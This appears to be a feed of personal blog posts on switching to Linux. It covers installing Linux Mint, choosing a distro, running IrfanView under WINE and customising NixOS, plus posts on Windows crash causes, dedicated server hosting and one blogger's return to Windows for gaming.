Text
Installing Linux (Mint) as a Non-Techy Person
I've wanted Linux for various reasons since college. I tried it once when I no longer had to worry about having specific programs for school, but it did not go well. It was a dedicated PC that was, I believe, poorly made. Anyway.
In the process of deGoogling and deWindows365'ing, I started to think about Linux again. Here is my experience.
Pre-Work: Take Stock
List out the programs you use regularly and those you need. Look up whether or not they work on Linux. For those that don't, look up alternatives.
If the alternative works on Windows/Mac, try it out first.
Make sure you have your files backed up somewhere.
Also, pick up a 5GB minimum USB drive.
Oh, and make a system restore point (look it up in your Start menu) and back up your files.
Step One: Choose a Distro
Dear god do Linux people like to talk about distros. Basically, from what all I've read, if you don't want to fuss a lot with your OS, you've got two options: Ubuntu and Linux Mint. Ubuntu is better known and run by a company called Canonical. Linux Mint is run by a small team and paid for via donations.
I chose Linux Mint. Some of the stuff I read about Ubuntu reminded me too much of my reasons for wanting to leave Windows, basically. Did I second-guess this a half-dozen times? Yes, yes I did.
The rest of this is true for Linux Mint Cinnamon only.
Step Two: Make your Flash Drive
Linux Mint has great instructions. For the most part they work.
Start here:
The trickiest part of creating the flash drive is verifying and authenticating it.
On the same page where you download the Linux .iso file, there are two links. Right-click each and choose 'Save as' to save both files to your computer. I saved them and the .iso file all to my Downloads folder.
Then, once you get to the 'Verify your ISO image' page in their guide and you're on Windows like me, skip down to this link about verifying on Windows.
Once it is verified, you can go back to the Linux Mint guide. They'll direct you to download Etcher and use that to create your flash drive.
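The whole verification step boils down to hashing the download and comparing it against the published checksum. Here's the idea in miniature on a stand-in file (with the real download you'd use the actual .iso plus the sha256sum.txt saved from the Mint site, and on plain Windows, `certutil -hashfile linuxmint.iso SHA256` prints the same kind of hash):

```shell
# Stand-ins only: a pretend iso and a checksum file generated from it.
# In real life, sha256sum.txt comes from the Linux Mint website.
printf 'stand-in for the iso' > linuxmint.iso
sha256sum linuxmint.iso > sha256sum.txt   # stands in for the published checksums
sha256sum -c sha256sum.txt                # prints "linuxmint.iso: OK" on a match
```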
If this step is too tricky, then please reconsider Linux. Subsequent steps are both easier and trickier.
Step Three: Restart from your Flash Drive
This is the step where I nearly gave up. The guide is still great, except it doesn't mention certain security features that make installing Linux Mint impossible without extra steps.
(1) Look up your Bitlocker recovery key and have it handy.
I don't know if you'll need it like I did (I did not turn off Bitlocker at first), but better to be safe.
(2) Turn off Bitlocker.
(3) Restart. When on the title screen, press your BIOS key. There might be more than one. On a Lenovo, pressing F1 several times gets you to the relevant menu. This is not the menu you'll use to install, though. Turn off "Secure Boot."
(4) Restart. This time press F12 (on a Lenovo). The HDD option, iirc, is your USB. Look it up on your phone to be sure.
Now you can return to the Linux Mint instructions.
Figuring this out via trial-and-error was not fun.
Step Four: Install Mint
Just follow the prompts. I chose to do the dual boot.
You will have to click through some scary messages about irrevocable changes. This is your last chance to change your mind.
I chose the dual boot because I may not have anticipated everything I'll need from Windows. My goal is to work primarily in Linux. Then, in a few months, if it is working, I'll look up the steps for making my machine Linux only.
Some Notes on Linux Mint
Some of the minor things I looked up ahead of time and other miscellany:
(1) HP Printers supposedly play nice with Linux. I have not tested this yet.
(2) Linux Mint can easily access your Windows files. I've read that this does not go both ways. I've not tested it yet.
(3) You can move the taskbar (panel in LM) to the left side of your screen.
(4) You are going to have to download your key programs again.
(5) The LM software manager has most programs, but not all. Some you'll have to download from websites. Follow instructions. If a file leads to a scary wall of strange text, close it and just do the Terminal instructions instead.
(6) The software manager also has fonts. I was able to get Fanwood (my favorite serif) and JetBrains (my favorite mono) easily.
In the end, be prepared for something to go wrong. Just trust that you are not the first person to ever experience the issue and look it up. If that doesn't help, you can always ask. The forums and reddit community both look active.
Text
Linux distros - what is the difference, which one should I choose?
Caution, VERY long post.
With more and more simmers looking into linux lately, I've been seeing the same questions over and over again: Which distro should I choose? Is distro xyz newbie-friendly? Does this program work on that distro?
So I thought I'd explain the concept of "distros" and clear some of that up.
What are the key differences between distros?
Linux distros are NOT different operating systems (they're all still linux!) and the differences between them aren't actually as big as you think.
Update philosophy: Some distros, like Ubuntu, (supposedly) focus more on stability than being up-to-date. These distros will release one big update once every year or every other year and they are thoroughly tested. However, because the updates are so huge, they inevitably tend to break stuff anyway. On the other end of the spectrum are so-called "rolling release" distros like Arch. They don't do big annual updates, but instead release smaller updates very frequently. They are what's called "bleeding edge" - if there is something new out there, they will be the first ones to get it. This can of course impact stability, but on the other hand, stuff gets improved and fixed very fast. Third, there are also "middle of the road" distros like Fedora, which kind of do... both. Fedora gets big version updates like Ubuntu, but they happen more frequently and are comparably smaller, thus being both stable and reasonably up-to-date.
Package manager: Different distros come with different package managers (APT on ubuntu, DNF on Fedora, etc.). Package managers keep track of all the installed programs on your PC and allow you to update/install/remove programs. You'll often work with the package manager in the terminal: For example, if you want to install lutris on Fedora, you'd type in "sudo dnf install lutris" ("sudo" stands for "super user do", it's the equivalent of administrator rights on Windows). Different package managers come with different pros and cons.
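As a concrete sketch of how the same install step looks across package managers (the `install_cmd` helper is mine, purely for illustration; only ever run the line that matches your own distro):

```shell
# Print the install command a given distro's package manager would use.
install_cmd() {
  case "$1" in
    ubuntu|mint) echo "sudo apt install $2" ;;   # Debian family: APT
    fedora)      echo "sudo dnf install $2" ;;   # Fedora: DNF
    arch)        echo "sudo pacman -S $2" ;;     # Arch: pacman
    *)           echo "unknown distro: $1" >&2; return 1 ;;
  esac
}

install_cmd fedora lutris   # -> sudo dnf install lutris
install_cmd mint lutris     # -> sudo apt install lutris
```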
Core utilities and programs: 99% of distros use the same stuff in the background (you don’t even directly interact with it, e.g. background process managing). The 1% that do NOT use the same stuff are obscure distros like VoidLinux, Artix, Alpine, Gentoo, Devuan. If you are not a Linux expert, AVOID THOSE AT ALL COST.
Installation process: Some distros are easier to install than others. Arch is infamous for being a bit difficult to install, but at the same time, its documentation is unparalleled. If you have patience and good reading comprehension, installing arch would literally teach you all you ever need to know about Linux. If you want to go an easier and safer route for now, anything with an installer like Mint or Fedora would suit you better.
Community: Pick a distro with an active community and lots of good documentation! You’ll need help. If you are looking at derivatives (e.g. ZorinOS, which is based on Ubuntu which is based on Debian), ask yourself: Does this derivative give you enough benefits to potentially give up community support of the larger distro it is based on? Usually, the answer is no.
Okay, but what EDITION of this distro should I choose?
"Editions" or “spins” usually refer to variations of the same distro with different desktop environments. The three most common ones you should know are GNOME, KDE Plasma and Cinnamon.
GNOME's UI is more similar to MacOS, but not exactly the same.
KDE Plasma looks and feels a lot like Windows' UI, but with more customization options.
Cinnamon is also pretty windows-y, but more restricted in terms of customization and generally deemed to be "stuck in 2010".
Mint vs. Pop!_OS vs. Fedora
Currently, the most popular distros within the Sims community seem to be Mint and Fedora (and Pop!_OS to some extent). They are praised for being "beginner friendly". So what's the difference between them?
Both Mint and Pop!_OS are based on Ubuntu, whereas Fedora is a "standalone" upstream distro, meaning it is not based on another distro.
Personally, I recommend Fedora over Mint and Pop!_OS for several reasons. To name only a few:
I mentioned above that Ubuntu's update philosophy tends to break things once a big update rolls around every two years. Since both Mint and Pop!_OS are based on Ubuntu, they are also affected by this.
Ubuntu, Mint and Pop!_OS like to modify their stuff regularly for theming/branding purposes, but this ALSO tends to break things. It is apparently so bad that there is an initiative to stop this.
Pop!_OS uses the GNOME desktop environment, which I would not recommend if you are switching from Windows. Mint offers Cinnamon, which is visually and technically outdated (they use the x11 windowing system standard from 1984), but still beloved by a lot of people. Fedora offers the more modern KDE Plasma.
Personal observation: Most simmers I've encountered who had severe issues with setting up Linux went with an Ubuntu-based distro. There's just something about it that's fucked up, man.
And this doesn't even get into the whole Snaps vs. Flatpak controversy, but I will skip this for brevity.
Does SimPE (or any other program) work on this distro?
If it works on Fedora, then it works on Mint/Ubuntu/Arch/etc., and vice versa. This is all just a question of having the necessary dependencies installed and installing the program itself properly. Some distros may have certain prerequisites pre-installed, while others don't, but you can always just install those yourself. Like I said, different distros are NOT different operating systems. It's all still Linux and you can ultimately customize it however you want.
In short: Yeah, all Sims 2-related programs work. Yes, ReShade too. It ultimately doesn't really matter what distro you use as long as it is not part of the obscure 1% I mentioned above.
A little piece of advice
Whatever distro you end up choosing: get used to googling stuff and practice reading comprehension! There are numerous forums, discord servers and subreddits where you can ask people for help. Generally speaking, the linux community is very open to helping newbies. HOWEVER, they are not as tolerant to nagging and laziness as the Sims community tends to be. Show initiative, use google search & common sense, try things out before screaming for help and be detailed and respectful when explaining your problems. They appreciate that. Also, use the arch wiki even if you do not use Arch Linux – most of it is applicable to other distros as well.
#simming on linux#bnb.txt#if anyone wants to use this as a base for a video feel free#i don't feel like recording and editing lol
Text
okay whenever i talk about linux i say shit like "development is easier" or throw around things like LXC or POSIX/UNIX, or whatever insane terms but:
here's my list of actual shit that the average person would care about
Most updates, including core system components, usually don't even need a reboot (please reboot your computer at least once a week). If one does, it waits for me to reboot. It won't ever stop me in the middle of something to ask me to, or force it on me.
If i plug in a device it will just work. I do not need to install drivers or some stinky special crap software for it to be detected, it will most often just work (every new linux kernel version adds so much support for new and old hardware. If it doesn't work now, it might work later!)
Package management. I've sung its praises so much already, but: on every other device I know, you can click a button and it will update all the apps on your device. Except Windows. App has an update? Open the software centre or Discover or whatever, click a button, boom, it's updated. All controlled from one place, no worries about whether the app updates itself, or whether you're downloading the right installer for your system. Just use the package manager that comes with the system and it's good.
It's as minimal as I want it to be. Both Windows and Mac suffer a lot from just having a bunch of crap that you cannot get rid of. I installed a distro which didn't even come with a graphical interface, it was that minimal. If the distro you use is a bit more reasonable, but it comes with some software you don't want, you can just get rid of it. Shit, if you wanted to you can just uninstall the Linux kernel and it will just let you, and your computer will be unbootable. You have full control over what you want on your system. Also uninstalling things is less stupid, there's far fewer cases of leftover files or shit lying around in the registry. (there is no registry)
Audio. "linux audio is bad" is a thing of the past and I'm so serious. Pipewire is an amazing thing. I have full control over which applications give output to which speakers, being able to route one app to multiple speakers at the same time, or even doing things like mapping an input device to speakers so I can monitor it back very easily. I still don't understand why Windows does the stupid "default communication device" thing, and they often reset my settings, like randomly changing it to 24 bit audio when I only use 16 and certain programs break with it set to 24, idfk. Maybe this is less of an "average user" thing and more of a poweruser thing, but I feel like there's SOMETHING in here which may be handy to the average person at some point. i love qpwgraph.
i could think of more but i dont use a computer like a normal person so it will take me time to think of it
Text
things that i think actually matter for beginner friendliness:
ROBUST FALLBACKS- i think opensuse's default installation is with btrfs root + grub + snapper + snapper hooks so that if an update ever goes bad you have an archive that you can boot from, immediately, straight from the boot screen, no terminal stuff. thats excellent and more distros should offer this oob. vanillaos's abroot system is also really cool with similar benefits
DISCOVERABLE UI- cinnamon (linux mint) is ok with this but i remember trying to figure out desktop and panel (taskbar) configuration was absolutely opaque to me and there weren't easy answers to how you were supposed to do things. i think kde is really excellent in terms of immediately discoverable ui from a windows expat perspective even though i dont really like the mouthfeel of it for personal use
PAINLESS UPDATES- EITHER use a rolling release system or make your default installation use separate root and home partitions, so that when a million dependencies are changed in your point release and you either have to reinstall or upgrade in place and find out everything broke and THEN reinstall, you dont have to frantically go through your entire computer to find where you might have important user files, save them to a usb, and reorganize them on a new install. this one is frustrating because it would be so easy for this to already be a standard for point release distros but it isnt. ??????
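the separate root + home idea above, sketched as fstab lines (the UUIDs are placeholders i made up, not real devices):

```shell
# Write an example fstab with / and /home on separate partitions,
# so a reinstall can reformat / while /home survives untouched.
cat <<'EOF' > fstab.example
UUID=1111-aaaa  /      ext4  defaults  0 1
UUID=2222-bbbb  /home  ext4  defaults  0 2
EOF
grep -c '^UUID' fstab.example   # two mount entries
```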
the package management thing is like. the whole reason any distros are different. i have my own opinions but it takes all types probably. but if flatpak's repos were better maintained, or if it were more common practice/more friendly and integrated to use distrobox for gui user programs, i think it would make everyones lives easier and level the playing field for people who actually do reasonably need stable* system components but up to date user apps. i think people are being whiny babies when they say its JUST IMPOSSIBLE to remember "apt-get (program name)" instead of pressing a button that says "get program name" but they got guis all over for the people that want them its an overstated problem
THINGS THAT DONT MATTER FOR USER FRIENDLINESS: why does everyone fucking act like ubuntu/mint's point releases and dead and rotting "stable" repos are an absolute benefit to newbies who dont know what they want or how to express what they want yet. breaking and changing dependencies are a bad situation to thrust upon unsuspecting noobs for sure but im pretty sure there is the exact same amount of that regardless of distro because it just does not happen often enough to be dampened by slower releases. like, the appimage integrator they packaged in mint going dead because of aging dependencies. like what did they want me to do about that as the end user who still wanted to integrate appimages?? as far as i could tell the answer is Nothing
*stupid word that causes like 90% of all problems when talking about linux
Text
How to install and use IrfanView in Linux - Tutorial
Updated: May 30, 2022
My Windows to Linux migration saga continues. We're still a long way off from finishing it, but it has begun, and I've also outlined a basic list of different programs I will need to try and test in Linux, to make sure when the final switch cometh that I have the required functionality. You can find a fresh bouquet of detailed tutorials on how to get SketchUp, Kerkythea, KompoZer, as well as Notepad++ running in Linux, all of them using WINE and successfully too, in my Linux category.
Today, my focus will be on IrfanView, a small, elegant image viewer for Windows, which I've been using with delight for decades now. It's got everything one needs, and often more than the competitors, hence this bold foray of using it in Linux despite the fact there are tons of native programs available. But let's proceed slowly and not get too far ahead of ourselves. After me.
As I said, it's majestic. A tiny program that does everything. It's fast and extremely efficient. When I posted my software checklist article, a lot of Linux folks said, well, you should try XnView instead. And I did, honest, several times, including just recently, which we will talk about in a separate article, but the endeavor reminded me of why I'd chosen IrfanView all those years back. And those reasons remain.
Then, I did play with pretty much every Linux image viewer out there. None is as good as IrfanView. It comes down to small but important things. For instance, in IrfanView, S will save a file, O will trigger the open dialog. Esc quits the program. Very fast. Most other programs use Ctrl + or Shift + modifiers, and that simply means more actions. I did once try to make GwenView use the full range of Irfan's shortcuts, but then I hit a problem of an ambiguous shortcut, wut. I really don't like the fact that hitting Esc takes you to a thumbnail overview mode. But that's what most programs do.
WINE configuration
The first step is to have WINE installed on your system. I am going to use the exact same method outlined in the SketchUp Make 2017 tutorial. I have the WINE repositories added, and I installed the 6.X branch on my system (at the time of writing).
IrfanView installation
Download the desired 32/64-bit version of the program and then install it. The process should be fast and straightforward. You will be asked to set up file type associations. You can do this or simply skip the step; it doesn't make any difference, because you'll need to associate IrfanView as the default image viewer, if that is your choice, through your distro's file type management utility, whatever it may be.
And the program now works! In Plasma, on top of that, you can also easily pin the icon to the task manager.
Plugins and existing configuration(s)
Much like with Notepad++, you can import your existing workspace from a Windows machine. You can copy plugins into the plugins folder, and the IrfanView INI files into the AppData/Roaming folder. If you don't have any plugins, but you'd like to use some, then you will need to download the IrfanView plugins bundle, extract it, and then selectively, manually copy the plugins into the WINE installation folder. For instance, for the 64-bit version of the program, this is the path:
~/.wine/drive_c/Program Files/IrfanView/Plugins
As a crude example, you may want to make IrfanView be able to open WebP files. In that case, you will need to copy the WebP.dll file into the folder above, and relaunch the program. Or you can copy the entire set of IrfanView plugins. Your choice, of course.
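That copy step, sketched in the terminal (paths assume the default WINE prefix; the guard makes it a no-op if WebP.dll isn't sitting in the current directory):

```shell
# Copy the WebP plugin into the 64-bit IrfanView tree inside the
# default WINE prefix; adjust PLUGIN_DIR if you use a custom prefix.
PLUGIN_DIR="$HOME/.wine/drive_c/Program Files/IrfanView/Plugins"
mkdir -p "$PLUGIN_DIR"            # ensure the folder exists
if [ -f WebP.dll ]; then          # DLL from the extracted plugins bundle
  cp WebP.dll "$PLUGIN_DIR/"
fi
```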
Conclusion
And thus, IrfanView is now part of our growing awesome collection of dependable tools that will make the Windows to Linux migration easier. I am quite sure the Linux purists will be angry about this article, as well as the other tutorials. But the real solution is to develop programs with equivalent if not superior functionality, and then, there will be no reason for any WINE hacks.
If you're an IrfanView user, and you're pondering a move to Linux, then you should be happy with this guide. It shows how to get the program running, and even import old settings and plugins. I've been using IrfanView in Linux for many years, and there have been no problems. That doesn't say anything about the future, of course, but then, if you look at what Windows was 10 years ago, and what it is now, it doesn't really matter. Well, that's the end of our mini-project for today. See you around. More tutorials on the way!
Cheers.
Text
NixOS Rice Journey
I've always considered myself something of a minimalist when it comes to function over form and beauty within simplicity, but there comes a time in every Linux user's life when they must rice.
Now, firstly, I want to acknowledge that @kfithen's recent ricing journey is like, 50% of the reason I went through with this (\shrug/ he had a good idea, what can I say?!). To be fair, the other 50% is the control and understanding that a good rice gives a person over their computer and environment. I want to know how everything works, and I want to be the person who makes it all come together really well.
I'm not really the type for flashy things or eye-catching rices / eye-candy (I've been using only I3wm for almost the entirety of my Linux history), so I want my rice to take a more subtle, simple approach. I use NixOS because I want my system to stay with me forever and only do what it needs to. I want to spend years optimizing everything I use until my OS reaches its minimal state. In the same way, I want my rice to display the elegant simplicity of nothing extra. I want some basic utilities and visuals that look nice, but aren't distracting.
Most of all, I want my rice to embody my own spirit, or at least what I strive to be. I want to put work into making something that does everything it needs to without encroaching on others. Ideally, I will be able to look at this every day for the rest of my life and it will help me feel secure in myself.
All that said, here's what I've done so far:
Migrated from X11 to Wayland
Switched to greetd and tuigreet for my displaymanager
Switched from I3wm to Sway
Setup Waybar to tell me what I need to know
Setup a custom desktop wallpaper (as opposed to the default Xfce wallpaper or Sway grey)
Setup vifm to view and manage my filesystem
Setup imv, foot, mpv, etc. to replace xfce-given programs
Upgraded from NixOS 23.11 to 24.05
[Image ID: A (16:9) screenshot of my desktop. There are no windows open. The wallpaper prominently features a modified Nix logo in the center, taking up a little over a third of the vertical space. The logo has been modified so that each of the six "arms" corresponds to a stripe in the trans-nonbinary-flag; the top-right corresponds to the blue stripe at the top of the flag and the arms continue down the flag in a clockwise motion (i.e. blue, pink, yellow, white, purple, black). The background of the wallpaper is a dark grey that is light enough for the black arm to be visible. At the bottom of the screenshot is a Waybar status bar. On the left it shows (left to right) the sway workspaces, workspace name, and scratchpad; on the right it shows (left to right) the system volume (with wireplumber), the keyboard layout, the free space on the root partition, the memory and sway information of the system, the local ip address and wifi-connection strength of the system, the core usage of the system, and the current time and date of the system. The bar is styled with the default styles (for now). \End ID]
[Image ID: Another desktop screenshot. This one shows three windows open with the Sway window manager/compositor. One window, containing my home-manager configuration open in neovim (using the slate colorscheme), is the result of a horizontal split and lies on the left half of the screen. The right half of the screen is vertically split into two windows. The top displays an unstyled vifm, and the bottom displays the output of neofetch. The inner gaps of the windows are set to 10 in sway and there are no other gap configurations. \End ID]
So far, I've been focusing mostly on getting my system working again (leaving xfce completely left a big mark on my system, previously I was using Thunar and a billion other things I took for granted). I'm going through another terminal-based-stuff craze so I'm trying to do more and more stuff through cli and tui applications (flameshot -> shotman, xfce-img-viewer -> imv, xfce-video-player -> mpv, thunar -> vifm).
The only thing I've done cosmetically so far is the background. I wanted to get something that wouldn't clutter my screen if I ever implement transparency, so I didn't want to do anything too complicated. (I'll admit, my first thoughts were Homestuck, Lackadaisy, trains, etc., but those were way too complicated (save for some of the Homestuck stuff, that was good, I just didn't super vibe with anything)). I'm really happy with how it turned out though (the Nix logo is great for customization)! I think the trans-nonbinary-flag colors look great here and fit the vibe sickly. Also, it's Pride Month, so how could I not have something queer on my screen all the time?!?!?! (Well, besides Linux, and NixOS especially, that's queer already, lol).
This post is getting a bit long, so I'll quit my yappin' and end it off with a little summary of what I hope to do next:
Get some sort of transparency (what's the use in having that beautiful wallpaper if you can't see it, plus the background has a low enough complexity that transparency will actually work well)
Set some standards for theming/colors and put them in place (right now my Waybar and vifm especially just don't look right) (this one is going to require a lot of work, but there are also a lot of people who do this amazingly; plus, I've got some colors to work with already :), I really like the "slate" vim theme and those trans-nonbinary colors are a great start as well, particularly that purple!)
MOAR TERMINAL (maybe try again with steam-tui, risk discord-tui, and re-examine links/lynx) (plus this really helps with fileviewer in vifm)
Try out nix-flakes (I really need to figure out what these things are, they sound right up my alley!)
Setup backups of my system / get all my configs into nix (the few that aren't already there) (I have some suspicion that nix-flakes might help with this)
Learn more (there's always more to learn!)
Welp, that's about it for now! See ya :3
Text
Common BSoD reasons (Blue Screen of DESU)
Your computer worked fine yesterday, and now it keeps crashing. Wa da heq?
The most common issues I've seen causing BSoDs aren't malware, or even user error. Though they're not the least common causes either.
They're from updates pushed by developers.
Usually it's from some system update that manages your memory allocation incorrectly. Or processor execution errors and mishaps handled incorrectly.
But it is also quite common for a driver update to cause the same issue. And because Video Card drivers update monthly; they're the most likely cause of breakage.
To be fair; not updating your drivers can be just as bad as updating your drivers, so it's important to know which driver configuration worked last.
And this is why Windows has system restore points.
Interestingly; one of the most common driver failures I've seen comes from the Nvidia graphics driver failing to regulate the card's internal temperature appropriately.
There's usually an internal thermal switch that cuts in when the card gets too hot, which then throttles your graphics card and will cause crashing.
And this thermal switch can degrade over time. Which means your graphics card has a lower tolerance for heat than it should.
However; elevation and humidity can *also* cause the same issue. Which means your rig might operate differently in Detroit Mi than it does in Dallas TX, or even SLC UT.
And quite often devs try to reduce their tolerances for kicking in the graphics card's cooling fans; power saving concerns, maybe.
And often they will wind up with your card running hotter than it should. This is why the EVGA tools (and other similar software tools) include manual fan controls.
Because the onboard regulation and default drivers tend to heck it all up.
But that's not the only issue I've seen with graphics cards; sometimes: the devs try to use more VRam than the card has. Or even less VRam and then just forget which blocks of VRam they set to be used by the system.
It can literally be fixed one day, and then unfixed and then next, and just toggle back and forth despite user complaints.
In fact; nearly any issue that is commonly considered "due to heating issues" can be traced back to driver issues for similar reasons to what I listed.
Incorrect memory usage, cooling regulation not appropriately modulating the cooling modules, the processor and graphics processor being sent incorrect commands.
Registry issues can also cause memory issues, as certain blocks of memory get used by too many sources at the same time (though not often), or multiple drivers end up trying to run the same hardware (which can also be caused by software creating extra instances of graphics-level singleton interfaces).
So if you're ever wondering what could possibly be wrong with your PC, it's more likely a driver issue.
But... You could also have forgotten to install cooling modules, or decided to overclock your hardware without increasing cooling.
Or even overclocked your hardware too much.
But barring overclocking; it's most likely driver issues. I've even seen Windows Surface devices on their end-of-life updates get driver updates that break graphics, causing overheating and ghosting (leftover images) on the screen.
Which I feel like may have been on purpose.
Though locating an older driver, or installing Linux usually worked if no *real* hardware issue was present.
Text
How Does Dedicated Server Hosting Work?
With dedicated server hosting, a client is provided a physical server that is exclusively dedicated to them. While in shared or virtual hosting the resources are divided between different users, a dedicated server provides all the resources, comprising the CPU, the RAM, the storage space, and the bandwidth, solely for the client's use. Here's an overview of how it works:
1. Provisioning and Setup
Choosing Specifications: The client chooses hardware requirements, including CPU cores, RAM size, storage type (SSD/HDD), and network bandwidth, according to their needs.
Operating System Installation: The preferred OS (Linux, Windows Server, or others) is preinstalled on the server by the hosting provider.
Server Management Software: Additional packages, such as a control panel (cPanel, Plesk) or a database server (MySQL, MSSQL), can also be preset.
Initial Configuration: The hosting provider sets up the network access on the server, updates the necessary security issues, and secures the appropriate firewall.
2. Access and Control
Full Root/Administrator Access: Clients fully manage the dedicated server, whatever its location, so they can install applications, run services, and modify settings.
Remote Management: Remote access is usually provided over SSH for Linux servers and Remote Desktop Protocol (RDP) for Windows-based servers.
Control Panels (Optional): Tools such as cPanel let you manage the server through a web-based graphical interface instead of the command line.
3. Performance and Resources
No Resource Sharing: All of the CPU, memory, and disk capacity is devoted to a single client.
Scalability: Dedicated servers are somewhat more constrained than cloud hosting, but they can be upgraded with additional hardware or load balancers.
4. Security and Monitoring
Isolated Environment: Because no other clients are served from the same machine, the risks that come from sharing a server with other users are absent.
DDoS Protection and Firewalls: Hosting providers typically include security features to counteract cyber threats.
Monitoring Tools: Server health (load, CPU usage, memory, and overall network activity) can be checked through a dashboard or other monitoring tools.
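As a sketch of what those monitoring tools report under the hood, the same numbers are available from stock Linux commands over SSH (no provider-specific tooling assumed):

```shell
# Quick health check on a Linux dedicated server:
uptime          # load averages over the last 1, 5, and 15 minutes
free -h         # memory usage in human-readable units
df -h /         # disk usage on the root filesystem
```

A provider dashboard is essentially collecting this same data on a schedule and graphing it.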
5. Backup and Maintenance
Automated Backups: Either the hosting provider or the client can schedule regular backups to guard against data loss.
Managed vs. Unmanaged Hosting:
Managed: The hosting provider handles updates, security patches, monitoring, and backups.
Unmanaged: The client is fully responsible for maintenance tasks.
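For the unmanaged case, even a minimal scheduled backup is better than none. Here is a sketch using tar; the SRC and DEST values are stand-ins to replace with your real data directory and backup location:

```shell
#!/bin/sh
# Minimal backup sketch: archive a directory into a date-stamped tarball.
# SRC and DEST default to throwaway demo paths; point them at real ones.
SRC="${SRC:-$(mktemp -d)/site}"     # stand-in for e.g. /var/www
DEST="${DEST:-$(mktemp -d)}"        # stand-in for e.g. /backups
mkdir -p "$SRC" "$DEST"
echo "demo content" > "$SRC/index.html"   # demo data so the sketch runs
STAMP=$(date +%Y%m%d)
tar czf "$DEST/backup-$STAMP.tar.gz" -C "$(dirname "$SRC")" "$(basename "$SRC")"
ls "$DEST"
```

Dropped into cron as a daily entry, this gives you regular backups; a managed host does the equivalent for you.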
6. Network and Bandwidth
High-Speed Connections: Dedicated servers in data centers typically come with generous bandwidth, so traffic is handled without lag.
Dedicated IP Address: Each server usually gets its own IP address, which is useful for hosting a website, mail server, or application.
7. Cost and Use Cases
Higher Cost: Because the environment is used by only one client, dedicated hosting is more expensive than shared or VPS hosting.
Use Cases: It is appropriate for resource-intensive workloads such as game servers, high-traffic websites, SaaS solutions, and enterprise-level databases.
To sum up, dedicated server hosting gives a client maximal control, security, and performance by handing over an entire server. It is a good fit for companies and organizations that require high reliability, run large workloads, or need a high level of data protection.
0 notes
Text
Boring Blog Episode 1
Hello ladies and gentlemen and welcome to the Boring Blog. I have spent many years playing with Linux but having got tired of fighting with graphics card settings and games I have this new Dell Inspiron 3525.
For the first two weeks of its life it ran EndeavourOS Galileo (Arch-based Linux); however, after getting tired of fighting with Proton and certain games not working, I have actually restored the Dell back to its Windows 11 Home setup.
I admit I really didn’t want to go back to Windows, but I tired of not being able to use the full potential of the Vega 8 graphics card. While it is never going to set the world on fire, I was having issues getting it to just play games it is more than capable of playing.
Do you honestly care which game broke the camel’s back? I got a little bored and wanted to play Blur (Activision driving game). I tried 5 different versions of Proton, messed with Lutris, and having to re-download the game each time was frustrating as hell.
So I eventually decided it was time to dump Linux and go back to familiar Windows world.
Now I know there are going to be many people informing me of the inherent evil corporation that Microsoft is and all its constant spying upon you. Yes, I know, but one thing Windows does have going for it is that most of the software/hardware in the world is supported and normally works out of the box first time.
To be honest I no longer give a toss who has my information. I am a very boring, nearly 50-year-old man. I am not exactly challenging Rockefeller for his billions and nothing I do is remotely exciting.
I am probably the one man who, if he was identity frauded, would probably end up getting it back, as it would be chronically sad how little you could do with it.
Please don’t do that…
So far I have managed to install and play everything I have thrown at Windows 11.
The only minor annoyance is that for some reason the right click menu has been shortened and you have to pick the extra options just to get things like copy and paste. Sure, I could use the keyboard shortcuts, but surely the fact I was given a mouse means I shouldn’t have to.
I guess this is the same as those who look at Linux and its reliance upon the terminal. We have designed a system which is more graphical and millions are spent on things like UX and UI and people still resorting to a text based prompt makes it all feel kind of redundant.
Then again this is from a guy who has a Ryzen 7 laptop and is using it to play spectrum games most of the time, so I guess I am nothing if not ironic. I doubt I am really stressing the processor by doing such.
Some people sit and play the latest Call of Duty at 4K with every graphical enhancement they can get to see the slightest flicker of a muzzle flash in the dark. I am playing Diablo from 1997 and hoping it will still play on a modern machine without fifteen patches.
I jest but I really did install OpenRCT2 0.47 which is the latest version in order to play Rollercoaster Tycoon 2 so I could design rollercoasters rather than play the actual parks.
Trust me, I have tried modern games; I last about eight and a half seconds before someone destroys me. It’s not fun. You know when you sit and play Untitled Goose Game because you think it’s fun, then something is seriously wrong with your life.
I admit I was never a great games player… However I do laugh when the guy who annihilated you at WRX Rally driving gets annoyed because you can get to Level 2 of Double Dragon without losing a life and they can’t.
I may not be able to 100% Cyberpunk 2077 as I doubt my machine would even get beyond 30 FPS but I can consistently get beyond Eugene’s Lair on Manic Miner.
People sit and brag about all the games they have completed. I have completed a small handful of games: Bruce Lee on the Spectrum, both the 48 and 128 versions of Knight Tyme, Diablo and Diablo II on PC, and beyond that, Untitled Goose Game.
I am never going to be classed a world class gamer.
To be honest once you have completed a game what is the point of going back?
You pay money for these games then decide, oh well, let’s put it on the shelf never to be used again. Maybe I’m missing something, like a brain.
I don’t buy a game to complete it. I buy it to enjoy the experience and have fun. Maybe I am wrong, but if your only goal is to say yep, I’ve beaten it, I think there is something fundamentally wrong.
Or is it just me that actually enjoys the game, and if it challenges you and you have to try several times and eventually admit, hey, I just can’t get this, am I the one who is fundamentally flawed? No, because I can always aspire to come back and try harder.
However if you are at a position where no game is challenging unless you require it to be brutally punishing then surely there is a problem.
I tire of this “Git Gud” culture. I don’t want to play a fighting game where each move requires sixteen sequenced button presses to impress people.
That’s not a game it’s a memory test. Sorry I play games to escape and enjoy myself not to be an endurance test of my stamina and ability to be a human being.
I admit I have been playing TLL on the Spectrum for over twenty years and I have never managed to beat the fourth round of targets. I have got four, but the last one eludes me; I just don’t have the control.
I have watched RZX playback of someone else doing it and even tried replicating it. I just don’t have the skill. However I still play the game.
Now people are trying to beat games in as quick a time as possible, completing games using shortcuts and exploits so they finish in under 5 minutes.
Using techniques to shave tenths of seconds off the run. Seriously, if I ever take that up then be the first to come and beat me senseless.
What a waste of life. Not only have I beat the game I do so quickly it ain’t worth watching. I honestly just don’t understand the mentality. Sure it shows they have skills to do such but now you have just completed another game and it goes on the shelf to be ignored faster than it was yesterday.
Mind you watching modern games that is the game. Wait for game to load, play for four minutes, get shot, wait thirty seconds for it reload, rinse, repeat.
This is why I don’t own a modern console. I really do not want one I really don’t need one and if I had to choose one I would probably go for a Switch.
It may be the slowest of the bunch but at least the games seem to last longer than three minutes a go.
Also it’s not 4K where you can see the balls of your horse retract in the cold. I just don’t need that level of detail.
Right, I am going to crawl back under my rock and play games that I can’t complete because I am incompetent. But I don’t care, as I can keep playing, not getting any better, and I still have a game to play.
Until next time … take care people.
0 notes
Text
Linux Life Episode 83
Well, here we are again ladies and gentlemen back at the blog stuff regarding my ongoing Linux experience.
